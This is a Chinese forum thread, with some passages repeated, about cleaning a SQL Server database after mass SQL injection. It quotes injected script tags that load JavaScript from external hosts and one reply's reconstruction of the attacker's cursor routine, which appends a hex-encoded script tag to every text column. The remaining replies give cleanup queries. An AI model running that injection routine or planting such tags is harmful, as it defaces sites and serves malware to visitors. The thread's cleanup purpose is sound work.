我有一个数据库中的表,结构和部分数据如下
id name content
1 daf 是的
2 组这 分哈地方
3 得AC 爱对ACM等等很多条数据,但现在遇到的情况是,因为被注,这个表中的数据被莫名其妙的加上了很多内容,如id name content
1 daf"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 是的"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr
2 组这"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 分哈地方"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr
3 得AC"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 爱对ACM"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr我现在想更新这些数据,目的是恢复到先前的数据,把所有的后面有"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr这些代码的数据给恢复到先前的样子id name content
1 daf 是的
2 组这 分哈地方
3 得AC 爱对ACM
请问该怎么做呢?谢谢
id name content
1 daf 是的
2 组这 分哈地方
3 得AC 爱对ACM等等很多条数据,但现在遇到的情况是,因为被注,这个表中的数据被莫名其妙的加上了很多内容,如id name content
1 daf"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 是的"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr
2 组这"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 分哈地方"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr
3 得AC"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 爱对ACM"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr我现在想更新这些数据,目的是恢复到先前的数据,把所有的后面有"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr这些代码的数据给恢复到先前的样子id name content
1 daf 是的
2 组这 分哈地方
3 得AC 爱对ACM
请问该怎么做呢?谢谢
怎么删掉?
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
------------------------------------------
数据库被注入攻击 所有文本型字下段数据都被加了 <script_src=http://ucmal.com/0.js> </script>
怎么删掉?
SQL code
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'转龟
想请问下,这里的 sysobjects syscolumns systypes分别是什么?我的这个表的名字是 article ,请问应该写在哪里?谢谢
如果只是个单表,直接update就行了.
但事实上不是这样,因为他并不仅仅是加了字符,而日截取你原来的字符又加的新字符串.
所以根本没有办法不用备份恢复.除非你的字段都是varcar老长,原内容极短.
所以各位星星发的那些replace的方法,解决不了实际问题,还是需要备份来恢复的.真正解决办法,是找到注入点.通过iis日志.
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b
where a.iD=b.iD AnD a.xtype='u'
AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor
into @t,@c
while(@@fetch_status=0)
begin
print('update [' + @t + '] set [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS varchar(67))')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b
where a.iD=b.iD AnD a.xtype='u'
AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
declare @str varchar(500)
--这里是你要替换的字符
--set @str='"></title><script src=http://s.see9.us/s.js></script><!--'
set @str='"> </title> <script src=http://%66%75%63%6B%75%75%2E%75%73/1.js> </scr'
open table_cursor fetch next from table_cursor
into @t,@c
while(@@fetch_status=0)
begin
exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;实际上解决不了什么问题,因为他update时,是先截后并串再更新的.
SET @fieldtype='nvarchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
我用这个可以完成了替换,并去掉了我想要去掉的内容,但现在遇到的了新的问题,就是执行了上面的代码后,所有的信息都变成了两条
变成了如下形式id name content
1 daf 是的
1 daf 是的
2 组这 分哈地方
2 组这 分哈地方
3 得AC 爱对ACM
3 得AC 爱对ACM 请问我该怎么办?